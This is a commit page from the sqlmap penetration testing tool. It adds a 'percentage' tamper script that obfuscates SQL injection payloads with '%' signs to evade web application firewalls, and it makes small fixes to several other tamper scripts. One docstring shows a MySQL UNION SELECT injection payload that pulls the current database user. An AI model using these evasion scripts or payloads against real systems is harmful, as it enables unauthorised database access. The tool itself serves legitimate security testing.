sqlmapproject/sqlmap
1
1
Fork 0
mirror of https://github.com/sqlmapproject/sqlmap.git synced 2024-11-22 09:36:35 +03:00
Code Issues Packages Projects Releases Wiki Activity

Added one more tamper script from Roberto Salgado and minor adjustment to others

Browse Source
This commit is contained in:
Bernardo Damele 2011-07-08 13:43:34 +00:00
parent 3985a81cb9
commit 05cb65b106
8 changed files with 71 additions and 14 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

2
tamper/equaltolike.py
View File

@ -17,7 +17,7 @@ from lib.core.enums import PRIORITY
__priority__ = PRIORITY.HIGHEST
def dependencies():
singleTimeWarnMessage("tamper script '%s' is unlikely to work against %s" % (os.path.basename(__file__)[:-3], DBMS.PGSQL))
singleTimeWarnMessage("tamper script '%s' is unlikely to work against %s" % (os.path.basename(__file__).split(".")[0], DBMS.PGSQL))
def tamper(payload):
"""

6
tamper/halfversionedmorekeywords.py
View File

@ -19,7 +19,7 @@ from lib.core.settings import IGNORE_SPACE_AFFECTED_KEYWORDS
__priority__ = PRIORITY.HIGHER
def dependencies():
singleTimeWarnMessage("tamper script '%s' is only meant to be run against %s < 5.0" % (os.path.basename(__file__)[:-3], DBMS.MYSQL))
singleTimeWarnMessage("tamper script '%s' is only meant to be run against %s < 5.1" % (os.path.basename(__file__).split(".")[0], DBMS.MYSQL))
def tamper(payload):
"""
@ -30,10 +30,10 @@ def tamper(payload):
* Output: value'/*!0UNION/*!0ALL/*!0SELECT/*!0CONCAT(/*!0CHAR(58,107,112,113,58),/*!0IFNULL(CAST(/*!0CURRENT_USER()/*!0AS/*!0CHAR),/*!0CHAR(32)),/*!0CHAR(58,97,110,121,58)), NULL, NULL#/*!0AND 'QDWa'='QDWa
Requirement:
* MySQL < 5.0
* MySQL < 5.1
Tested against:
* MySQL 4.0.18
* MySQL 4.0.18, 5.0.22
Notes:
* Useful to bypass several web application firewalls when the

56
tamper/percentage.py Normal file
View File

@ -0,0 +1,56 @@
#!/usr/bin/env python
"""
$Id$
Copyright (c) 2006-2011 sqlmap developers (http://www.sqlmap.org/)
See the file 'doc/COPYING' for copying permission
"""
import os
import string
from lib.core.enums import PRIORITY
from lib.core.common import singleTimeWarnMessage
__priority__ = PRIORITY.LOW
def dependencies():
singleTimeWarnMessage("tamper script '%s' is only meant to be run against ASP web applications" % os.path.basename(__file__).split(".")[0])
def tamper(payload):
"""
Adds a percentage sign ('%') infront of each character
Example:
* Input: SELECT FIELD FROM TABLE
* Output: %S%E%L%E%C%T %F%I%E%L%D %F%R%O%M %T%A%B%L%E
Requirement:
* ASP
Tested against:
* Microsoft SQL Server 2000, 2005
* MySQL 5.1.56, 5.5.11
* PostgreSQL 9.0
Notes:
* Useful to bypass weak and bespoke web application firewalls
"""
if payload:
retVal = ""
i = 0
while i < len(payload):
if payload[i] == '%' and (i < len(payload) - 2) and payload[i+1] in string.hexdigits and payload[i+2] in string.hexdigits:
retVal += payload[i:i+3]
i += 3
elif payload[i] != ' ':
retVal += '%%%s' % payload[i]
i += 1
else:
retVal += payload[i]
i += 1
return retVal

2
tamper/space2extrarandomblank.py
View File

@ -17,7 +17,7 @@ from lib.core.enums import PRIORITY
__priority__ = PRIORITY.LOW
def dependencies():
singleTimeWarnMessage("tamper script '%s' is only meant to be run against %s" % (os.path.basename(__file__)[:-3], DBMS.MYSQL))
singleTimeWarnMessage("tamper script '%s' is only meant to be run against %s" % (os.path.basename(__file__).split(".")[0], DBMS.MYSQL))
def tamper(payload):
"""

4
tamper/space2morepound.py
View File

@ -21,7 +21,7 @@ from lib.core.settings import IGNORE_SPACE_AFFECTED_KEYWORDS
__priority__ = PRIORITY.LOW
def dependencies():
singleTimeWarnMessage("tamper script '%s' is only meant to be run against %s > 5.1.13" % (os.path.basename(__file__)[:-3], DBMS.MYSQL))
singleTimeWarnMessage("tamper script '%s' is only meant to be run against %s > 5.1.13" % (os.path.basename(__file__).split(".")[0], DBMS.MYSQL))
def tamper(payload):
"""
@ -40,6 +40,8 @@ def tamper(payload):
Notes:
* Useful to bypass several web application firewalls
* Used during the ModSecurity SQL injection challenge,
http://modsecurity.org/demo/challenge.html
"""
def process(match):

4
tamper/space2pound.py
View File

@ -18,7 +18,7 @@ from lib.core.enums import PRIORITY
__priority__ = PRIORITY.LOW
def dependencies():
singleTimeWarnMessage("tamper script '%s' is only meant to be run against %s" % (os.path.basename(__file__)[:-3], DBMS.MYSQL))
singleTimeWarnMessage("tamper script '%s' is only meant to be run against %s" % (os.path.basename(__file__).split(".")[0], DBMS.MYSQL))
def tamper(payload):
"""
@ -37,6 +37,8 @@ def tamper(payload):
Notes:
* Useful to bypass several web application firewalls
* Used during the ModSecurity SQL injection challenge,
http://modsecurity.org/demo/challenge.html
"""
retVal = ""

6
tamper/versionedkeywords.py
View File

@ -18,7 +18,7 @@ from lib.core.enums import PRIORITY
__priority__ = PRIORITY.HIGHER
def dependencies():
singleTimeWarnMessage("tamper script '%s' is only meant to be run against %s" % (os.path.basename(__file__)[:-3], DBMS.MYSQL))
singleTimeWarnMessage("tamper script '%s' is only meant to be run against %s" % (os.path.basename(__file__).split(".")[0], DBMS.MYSQL))
def tamper(payload):
"""
@ -32,9 +32,7 @@ def tamper(payload):
* MySQL
Tested against:
* MySQL 4.0.18
* MySQL 5.1.56
* MySQL 5.5.11
* MySQL 4.0.18, 5.1.56, 5.5.11
Notes:
* Useful to bypass several web application firewalls when the

5
tamper/versionedmorekeywords.py
View File

@ -19,7 +19,7 @@ from lib.core.settings import IGNORE_SPACE_AFFECTED_KEYWORDS
__priority__ = PRIORITY.HIGHER
def dependencies():
singleTimeWarnMessage("tamper script '%s' is only meant to be run against %s >= 5.1.13" % (os.path.basename(__file__)[:-3], DBMS.MYSQL))
singleTimeWarnMessage("tamper script '%s' is only meant to be run against %s >= 5.1.13" % (os.path.basename(__file__).split(".")[0], DBMS.MYSQL))
def tamper(payload):
"""
@ -33,8 +33,7 @@ def tamper(payload):
* MySQL >= 5.1.13
Tested against:
* MySQL 5.1.56
* MySQL 5.5.11
* MySQL 5.1.56, 5.5.11
Notes:
* Useful to bypass several web application firewalls when the